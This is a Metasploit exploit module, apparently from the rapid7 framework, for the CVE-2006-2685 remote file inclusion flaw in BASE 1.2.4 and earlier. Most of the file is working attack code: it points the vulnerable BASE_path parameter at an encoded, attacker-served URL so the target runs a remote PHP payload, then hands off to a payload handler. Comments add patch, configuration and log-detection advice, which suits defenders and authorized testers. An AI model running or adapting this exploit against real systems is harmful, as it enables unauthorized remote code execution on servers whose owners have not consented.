GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/base_qry_common.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for the remote file inclusion (RFI) flaw in the
# base_qry_common.php script of BASE 1.2.4 and earlier (CVE-2006-2685).
#
# The request path comes from the PHPURI option. Its !URL! placeholder is
# replaced with the value of php_include_url, so the include parameter
# (BASE_path in the default PHPURI) ends up pointing at that URL.
#
# Defender notes:
# * Affected versions, per the module description: BASE 1.2.4 and earlier.
#   Upgrading past 1.2.4 is the primary fix (confirm against the vendor
#   advisory for the exact fixed release).
# * PHP only includes a remote URL when URL includes are permitted, so keeping
#   allow_url_include disabled in php.ini (allow_url_fopen on PHP versions that
#   predate that directive) is a useful second layer.
# * Detection: web-server or proxy log entries for base_qry_common.php whose
#   BASE_path parameter carries a URL. This module percent-encodes every byte
#   of that URL, so match on the decoded value rather than on a literal
#   "http://" substring.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::PHPInclude

  # Registers the module metadata and the single PHPURI option.
  #
  # @param info [Hash] metadata supplied by the framework and merged with the
  #   values below through update_info
  def initialize(info = {})
    module_info = {
      'Name' => 'BASE base_qry_common Remote File Include',
      'Description' => %q{
        This module exploits a remote file inclusion vulnerability in
        the base_qry_common.php file in BASE 1.2.4 and earlier.
      },
      'Author' => ['MC'],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2006-2685'],
        ['OSVDB', '49366'],
        ['BID', '18298'],
      ],
      'Privileged' => false,
      'Payload' => {
        'DisableNops' => true,
        'Compat' => {
          'ConnectionType' => 'find',
        },
        'Space' => 32768,
      },
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [['Automatic', {}]],
      # NOTE(review): this date is two years later than the year in the CVE
      # identifier above; confirm it against the original advisory.
      'DisclosureDate' => '2008-06-14',
      'DefaultTarget' => 0,
      # Reliability, stability and side effects have not been assessed for
      # this module, so its impact on the target service is undocumented.
      'Notes' => {
        'Reliability' => UNKNOWN_RELIABILITY,
        'Stability' => UNKNOWN_STABILITY,
        'SideEffects' => UNKNOWN_SIDE_EFFECTS
      }
    }
    super(update_info(info, module_info))

    php_uri_option = OptString.new(
      'PHPURI',
      [
        true,
        "The URI to request, with the include parameter changed to !URL!",
        "/base/base_qry_common.php?BASE_path=!URL!"
      ]
    )
    register_options([php_uri_option])
  end

  # Sends the single HTTP request that carries the include URL.
  #
  # Presumably invoked by the PHPInclude mixin, which is defined outside this
  # file; php_include_url and handler also come from included framework code.
  def php_exploit
    # Very short wait: a nil response is tolerated below, so the HTTP reply is
    # only used to report a non-200 status when one arrives in time.
    wait = 0.01

    # Rex::Text.to_hex with a "%" prefix percent-encodes every byte of the URL
    # before it is substituted into the PHPURI template.
    template = datastore['PHPURI']
    encoded_url = Rex::Text.to_hex(php_include_url, "%")
    uri = template.gsub('!URL!', encoded_url)
    print_status("Trying uri #{uri}")

    request_opts = {
      'global' => true,
      'uri' => uri,
    }
    response = send_request_raw(request_opts, wait)

    # A non-200 reply is reported but does not stop the run.
    print_error("Server returned non-200 status code (#{response.code})") if response && response.code != 200

    handler
  end
end